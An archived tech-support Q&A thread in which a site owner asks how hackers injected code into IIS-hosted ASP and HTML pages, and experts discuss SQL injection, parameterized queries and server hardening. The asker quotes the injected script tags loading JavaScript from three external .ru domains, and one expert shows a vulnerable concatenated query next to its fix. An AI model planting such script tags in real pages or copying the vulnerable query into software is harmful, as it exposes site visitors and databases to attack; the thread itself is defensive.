Solved

regarding IIS server hack

Posted on 2008-10-29
4
580 Views
Last Modified: 2013-12-04
Hi,

We have Verio/Ntt Windows shared Hosting Plans and we configure our imp. client on their, this is Global client website, this way some of hackers always try to hack this website, this website also connect with SQL server 2005 database,
But presently hacker are able to hack the static and dynamic pages (.asp and .html), We have found that the following script in our web pages,
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<script src=http://www.lang42.ru/script.js></script><script src=http://www.errghr.ru/script.js></script>
<script src=http://www.berjke.ru/script.js></script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I got the following links which is related   the website hack issue
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Kindly let me know how I can check my whole website and also sql server to know that how hacker hack our website and also how I can secure our server

Regards,
Naresh
0
Comment
Question by:sitg
  • 2
4 Comments
 
LVL 32

Expert Comment

by:Daniel Wilson
ID: 22831130
If they changed static pages, it's not JUST a SQL injection.

Did stuff in the database change?  Or just your pages?

If stuff in the DB changed, suspect a SQL injection.  The classic method for hardening against that attack is parameterization of all queries that accept user input.  

e.g. sql = "Select * from Users where Username = '" + Request("Username") + "' "
becomes
sql = "Select * from Users where Username = @UserName"
command.parameters.add ("@userName", Request("Username"))

For the non-SQL-Injection hack ... look at IIS security.
0
 
LVL 2

Expert Comment

by:devshb
ID: 22839639
DanielWilson is right in my opinion; the physical attack/change of the html files does indicate a server/ftp (or possible cms-system admin) security problem rather than just a simple data vulnerability problem.

However, you might have both (physical attacks on the files, and injections/xss to the data)

For data:
Take a look at:
http://www.sqlinjectionscanner.com/

They've got a free data scanner; you can use that to double-check if there's any injected data hanging around in the database.

Securing your code/database is obviously a good idea, but hackers will almost always find any vulnerabilities you might have, so it's a good idea to have a reliable full-scan tool available which is dedicated to the task of checking against injected data/xss attacks in the data.

ie click on the download free version of the "ASP SQL Injection Scanner Tool"

I think the physical attack on the files is more pressing than a potential data injection though, because if they can physically change your files then you need to get that aspect secured first. eg change all your helm/ftp pwds, and look into the logfiles to see if people are using, say, your own cms admin system (if you have one) to effect the files.

Usually a physical attack like this would be due to a server managing to somehow get onto the server, you might need to totally reformat the server in order to find it because some viruses are buried so deeply that anti-virus software can't find them.

So, I'd say, change all your pwds, look into the logfiles, and check with the host to see if a virus is actually on the server itself.
0
 
LVL 2

Expert Comment

by:devshb
ID: 22839648
"Usually a physical attack like this would be due to a server managing to somehow get onto the server"

I meant:

"Usually a physical attack like this would be due to a *virus* managing to somehow get onto the server"

(sorry)
0
 

Accepted Solution

by:
sitg earned 0 total points
ID: 23053650
I have run the Acunetix Web Vulnerability Scanner and resolve this issue,
lots of web pages having sql injection issue.

Regards,
Naresh
0

Featured Post

VMware Disaster Recovery and Data Protection

In this expert guide, you’ll learn about the components of a Modern Data Center. You will use cases for the value-added capabilities of Veeam®, including combining backup and replication for VMware disaster recovery and using replication for data center migration.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Windows Security Event ID to check for Service account usage 3 128
SQL help 5 50
internet access from windows servers 4 65
CREATE DATABASE ENCRYPTION KEY 1 56
Security measures require Windows be logged in using Standard User login (not Administrator).  Yet, sometimes an application has to be run “As Administrator” from a Standard User login.  This paper describes how to create a shortcut icon to launch a…
Recently, I read that Microsoft has analysed statistics for their security intelligence report. It revealed: still, the clear majority of windows users do their daily work as administrator. An administrative account is a burden, security-wise. My ar…
Delivering innovative fully-managed cloud services for mission-critical applications requires expertise in multiple areas plus vision and commitment. Meet a few of the people behind the quality services of Concerto.
A company’s greatest vulnerability is their email. CEO fraud, ransomware and spear phishing attacks are the no1 threat to a company’s security. Cybercrime is responsible for the largest loss of money to companies today with losses projected to r…

914 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

19 Experts available now in Live!

Get 1:1 Help Now